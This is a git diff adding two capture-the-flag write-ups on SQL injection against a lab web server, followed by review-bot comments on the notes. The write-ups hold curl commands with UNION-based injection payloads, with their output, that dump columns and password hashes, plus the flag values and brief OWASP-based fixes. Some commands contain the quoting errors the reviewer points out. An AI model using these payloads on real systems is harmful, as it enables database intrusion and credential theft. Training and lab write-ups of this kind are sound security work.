| Mode | File | Lines |
|---|---|---|
| -rw-r--r-- | SQL injection 1/Resources/notes.md | 33 |
| -rw-r--r-- | SQL injection 1/flag | 1 |
| -rw-r--r-- | SQL injection 2/Resources/notes.md | 28 |
| -rw-r--r-- | SQL injection 2/flag | 1 |
4 files changed, 63 insertions, 0 deletions
diff --git a/SQL injection 1/Resources/notes.md b/SQL injection 1/Resources/notes.md new file mode 100644 index 0000000..3292f86 --- /dev/null +++ b/SQL injection 1/Resources/notes.md 
@@ -0,0 +1,33 @@ +## Exploit + +1. At `http://10.0.2.15/?page=member` we can inject SQL. Using an empty input and we see the error `You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1` so we can assume the SQL query is shaped like `… WHERE id=<our input>` +1. Try to `SELECT` everything with a `UNION`: + ```bash + ❯ curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode 'id=5 UNION SELECT * FROM users' + … + <pre>The used SELECT statements have a different number of columns</pre> + ``` +1. From the previous output we try an increasing number of placeholders to deduce that the original query uses two columns: + ```bash + ❯ curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode 'id=5 UNION SELECT 1,2 FROM users' + ``` +1. We get a list of all columns of all tables in the database: + ```bash + ❯ curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT column_name, table_name FROM information_schema.columns" | sed 's/<pre>/\ + /g' | grep --only-matching "First name:.*" + ``` +1. After trying a bunch of them we see that `Commentaire` and `countersign` hold a clue and a hashed password: + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT Commentaire, countersign FROM users" | sed 's/<pre>/\ + /g | grep --only-matching "First name:.*" + … + First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !<br>Surname : 5ff9d0165b4f92b14994e5c685cdce28</pre><table width=50%> + ``` +1. 
`5ff9d0165b4f92b14994e5c685cdce28` reverse md5 lookup → "FortyTwo" → lowercase → "fortytwo" → `echo -n fortytwo | sha256sum` + +## Fix + +[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection]() + +- Don't show SQL errors on the front-end because it gives attackers clues about the database and the queries that can be used to exploit them +- Don't include untrusted, unfiltered and/or unsanitized input into a SQL query diff --git a/SQL injection 1/flag b/SQL injection 1/flag new file mode 100644 index 0000000..4916501 --- /dev/null +++ b/SQL injection 1/flag @@ -0,0 +1 @@ +f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188 diff --git a/SQL injection 2/Resources/notes.md b/SQL injection 2/Resources/notes.md new file mode 100644 index 0000000..282802f --- /dev/null +++ b/SQL injection 2/Resources/notes.md 
@@ -0,0 +1,28 @@ +## Exploit + +1. See **SQL injection 1**. We do the same recon, but we explore other tables than `users`. +1. This query, meant to explore the columns of the table `list_images`, does not output anything because it's not in the same table as the original query + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT title,comment FROM list_images" | sed 's/<pre>\ + /g' | grep --only-matching "First name:.*"` + ``` +1. We use an extra query to find the schema to which the `list_images` table belongs + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT table_schema,table_name FROM information_schema.columns" | sed 's/<pre>/\ + /g' | grep --only-matching ".*list_images.*" + ``` +1. From the following query we find a clue (similarly to **SQL injection 1**) + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT title,comment FROM Member_images.list_images" | sed 's/<pre>/\ + /g' | grep --only-matching "First name:.*" + … + First name: Hack me ?<br>Surname : If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46</pre><table width=50%> + ``` +1. `1928e8083cf461a51303633093573c46` reverse md5 lookup → `albatroz` → `echo -n albatroz | sha256sum` + +## Fix + +[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection]() + +- Don't show SQL errors on the front-end because it gives attackers clues about the database and the queries that can be used to exploit them +- Don't include untrusted, unfiltered and/or unsanitized input into a SQL query diff --git a/SQL injection 2/flag b/SQL injection 2/flag new file mode 100644 index 0000000..ed9f3f6 --- /dev/null +++ b/SQL injection 2/flag 
@@ -0,0 +1 @@ +10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5 |
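Review bot: in `SQL injection 1/Resources/notes.md`, the `sed` in step 5 is missing the closing single quote after `/g`, so the shell keeps reading the quoted string through the `| grep` and the command as written never runs; it should end `'s/<pre>/\<newline>/g' | grep --only-matching "First name:.*"` exactly like the working one in step 4. Two smaller points in the same file: the OWASP reference is written as `[https://owasp.org/...]()` with an empty link target, so it renders as plain text instead of a link (put the URL inside the parentheses or wrap it in `<...>`), and the second "Fix" bullet should name the actual control rather than only "don't include unsanitized input": use a prepared statement with a bound parameter for `id` (and cast `id` to an integer before it reaches the query, since the notes establish it is compared as `WHERE id=<input>`). Blacklisting characters is not a fix for this class of bug.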
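Review bot: in `SQL injection 2/Resources/notes.md`, the explanation in step 2 is wrong: `UNION SELECT title,comment FROM list_images` returns nothing because `list_images` lives in a different database (the `Member_images` schema that step 3 goes on to find), not the one the application's connection has selected, so the unqualified table name is not resolved. A `UNION` does not require both `SELECT`s to read the same table; step 4 of `SQL injection 1` already unions against `information_schema.columns`. Suggested wording: "does not output anything because the table is in another schema than the one the page's query runs against, so the unqualified name is not found; qualify it as `Member_images.list_images`". The `sed` in that step is also broken, `'s/<pre>\<newline>/g'` has no `/` between the pattern and the replacement (`sed: unterminated 's' command`), and there is a stray backtick after `"First name:.*"`. Minor: step 3 selects `table_schema,table_name` from `information_schema.columns`, which yields one row per column; `information_schema.tables` gives one row per table and keeps the `grep` output short. The OWASP link has the same empty `()` target as in the first write-up.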
